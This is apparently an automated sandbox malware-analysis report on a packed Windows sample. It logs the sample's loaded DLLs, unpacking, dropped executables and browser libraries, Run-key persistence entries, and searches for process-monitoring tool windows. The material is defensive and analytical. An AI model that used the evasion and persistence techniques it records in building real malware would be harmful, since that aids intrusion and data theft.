Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1816064 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: Raw size of xokcbvfd is bigger than: 0x100000 < 0x1a1200
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2225886155.000000006C5CD000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2226169893.000000006C78F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 5a20612cd1.exe, 00000011.00000003.3221168796.00000000081F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2225886155.000000006C5CD000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.e60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xokcbvfd:EW;ingsbras:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xokcbvfd:EW;ingsbras:EW;.taggant:EW;
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Unpacked PE file: 9.2.EBAEBFIIEC.exe.570000.0.unpack :EW;.rsrc:W;.idata :W;azhnnvna:EW;slqbrtle:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;azhnnvna:EW;slqbrtle:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 10.2.skotes.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W;azhnnvna:EW;slqbrtle:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;azhnnvna:EW;slqbrtle:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 11.2.skotes.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W;azhnnvna:EW;slqbrtle:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;azhnnvna:EW;slqbrtle:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Unpacked PE file: 15.2.5a20612cd1.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rmyngibq:EW;qytqqcga:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rmyngibq:EW;qytqqcga:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Unpacked PE file: 16.2.0882197cda.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xokcbvfd:EW;ingsbras:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xokcbvfd:EW;ingsbras:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Unpacked PE file: 17.2.5a20612cd1.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rmyngibq:EW;qytqqcga:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rmyngibq:EW;qytqqcga:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Unpacked PE file: 33.2.0882197cda.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xokcbvfd:EW;ingsbras:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xokcbvfd:EW;ingsbras:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Unpacked PE file: 34.2.9c573f8941.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;clroiqwq:EW;jwelxfrk:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Unpacked PE file: 39.2.9c573f8941.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;clroiqwq:EW;jwelxfrk:EW;.taggant:EW; vs :ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5BC410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.12.dr Static PE information: real checksum: 0x1ec068 should be: 0x1e7575
Source: 3e3be1ecc4.exe.12.dr Static PE information: real checksum: 0x1ec068 should be: 0x1e7575
Source: 5a20612cd1.exe.12.dr Static PE information: real checksum: 0x1c43a8 should be: 0x1c94c4
Source: 0882197cda.exe.12.dr Static PE information: real checksum: 0x1c2916 should be: 0x1bbf00
Source: random[1].exe.0.dr Static PE information: real checksum: 0x32136f should be: 0x318cc5
Source: EBAEBFIIEC.exe.0.dr Static PE information: real checksum: 0x32136f should be: 0x318cc5
Source: 9c573f8941.exe.12.dr Static PE information: real checksum: 0x2b2913 should be: 0x2b0e0b
Source: random[1].exe0.12.dr Static PE information: real checksum: 0x1c43a8 should be: 0x1c94c4
Source: random[1].exe1.12.dr Static PE information: real checksum: 0x1c2916 should be: 0x1bbf00
Source: file.exe Static PE information: real checksum: 0x1c2916 should be: 0x1bbf00
Source: skotes.exe.9.dr Static PE information: real checksum: 0x32136f should be: 0x318cc5
Source: random[2].exe.12.dr Static PE information: real checksum: 0x2b2913 should be: 0x2b0e0b
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: xokcbvfd
Source: file.exe Static PE information: section name: ingsbras
Source: file.exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: azhnnvna
Source: random[1].exe.0.dr Static PE information: section name: slqbrtle
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: EBAEBFIIEC.exe.0.dr Static PE information: section name:
Source: EBAEBFIIEC.exe.0.dr Static PE information: section name: .idata
Source: EBAEBFIIEC.exe.0.dr Static PE information: section name: azhnnvna
Source: EBAEBFIIEC.exe.0.dr Static PE information: section name: slqbrtle
Source: EBAEBFIIEC.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: .idata
Source: skotes.exe.9.dr Static PE information: section name: azhnnvna
Source: skotes.exe.9.dr Static PE information: section name: slqbrtle
Source: skotes.exe.9.dr Static PE information: section name: .taggant
Source: random[2].exe.12.dr Static PE information: section name:
Source: random[2].exe.12.dr Static PE information: section name: .idata
Source: random[2].exe.12.dr Static PE information: section name: clroiqwq
Source: random[2].exe.12.dr Static PE information: section name: jwelxfrk
Source: random[2].exe.12.dr Static PE information: section name: .taggant
Source: 9c573f8941.exe.12.dr Static PE information: section name:
Source: 9c573f8941.exe.12.dr Static PE information: section name: .idata
Source: 9c573f8941.exe.12.dr Static PE information: section name: clroiqwq
Source: 9c573f8941.exe.12.dr Static PE information: section name: jwelxfrk
Source: 9c573f8941.exe.12.dr Static PE information: section name: .taggant
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name: .idata
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name: klrfnhju
Source: random[1].exe.12.dr Static PE information: section name: auusyycz
Source: random[1].exe.12.dr Static PE information: section name: .taggant
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name:
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name: .idata
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name:
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name: klrfnhju
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name: auusyycz
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name: .taggant
Source: random[1].exe0.12.dr Static PE information: section name:
Source: random[1].exe0.12.dr Static PE information: section name: .idata
Source: random[1].exe0.12.dr Static PE information: section name:
Source: random[1].exe0.12.dr Static PE information: section name: rmyngibq
Source: random[1].exe0.12.dr Static PE information: section name: qytqqcga
Source: random[1].exe0.12.dr Static PE information: section name: .taggant
Source: 5a20612cd1.exe.12.dr Static PE information: section name:
Source: 5a20612cd1.exe.12.dr Static PE information: section name: .idata
Source: 5a20612cd1.exe.12.dr Static PE information: section name:
Source: 5a20612cd1.exe.12.dr Static PE information: section name: rmyngibq
Source: 5a20612cd1.exe.12.dr Static PE information: section name: qytqqcga
Source: 5a20612cd1.exe.12.dr Static PE information: section name: .taggant
Source: random[1].exe1.12.dr Static PE information: section name:
Source: random[1].exe1.12.dr Static PE information: section name: .idata
Source: random[1].exe1.12.dr Static PE information: section name:
Source: random[1].exe1.12.dr Static PE information: section name: xokcbvfd
Source: random[1].exe1.12.dr Static PE information: section name: ingsbras
Source: random[1].exe1.12.dr Static PE information: section name: .taggant
Source: 0882197cda.exe.12.dr Static PE information: section name:
Source: 0882197cda.exe.12.dr Static PE information: section name: .idata
Source: 0882197cda.exe.12.dr Static PE information: section name:
Source: 0882197cda.exe.12.dr Static PE information: section name: xokcbvfd
Source: 0882197cda.exe.12.dr Static PE information: section name: ingsbras
Source: 0882197cda.exe.12.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B536 push ecx; ret 0_2_6C58B549
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_0058D91C push ecx; ret 9_2_0058D92F
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_00581359 push es; ret 9_2_0058135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00F9D91C push ecx; ret 10_2_00F9D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00F9D91C push ecx; ret 11_2_00F9D92F
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D095F7 push ecx; ret 13_3_04D0960A
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Code function: 13_3_04D2037D push esi; ret 13_3_04D20386
Source: file.exe Static PE information: section name: xokcbvfd entropy: 7.953900079185616
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.0854159881757495
Source: EBAEBFIIEC.exe.0.dr Static PE information: section name: entropy: 7.0854159881757495
Source: skotes.exe.9.dr Static PE information: section name: entropy: 7.0854159881757495
Source: random[2].exe.12.dr Static PE information: section name: entropy: 7.800049111886736
Source: 9c573f8941.exe.12.dr Static PE information: section name: entropy: 7.800049111886736
Source: random[1].exe.12.dr Static PE information: section name: klrfnhju entropy: 7.94158699808871
Source: 3e3be1ecc4.exe.12.dr Static PE information: section name: klrfnhju entropy: 7.94158699808871
Source: random[1].exe0.12.dr Static PE information: section name: entropy: 7.98596751431181
Source: random[1].exe0.12.dr Static PE information: section name: rmyngibq entropy: 7.954341436383283
Source: 5a20612cd1.exe.12.dr Static PE information: section name: entropy: 7.98596751431181
Source: 5a20612cd1.exe.12.dr Static PE information: section name: rmyngibq entropy: 7.954341436383283
Source: random[1].exe1.12.dr Static PE information: section name: xokcbvfd entropy: 7.953900079185616
Source: 0882197cda.exe.12.dr Static PE information: section name: xokcbvfd entropy: 7.953900079185616

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\EBAEBFIIEC.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\EBAEBFIIEC.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Jump to dropped file
Source: C:\Users\user\Documents\EBAEBFIIEC.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c573f8941.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5a20612cd1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0882197cda.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6693ff7180.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Window searched: window name: FilemonClass Jump to behavior
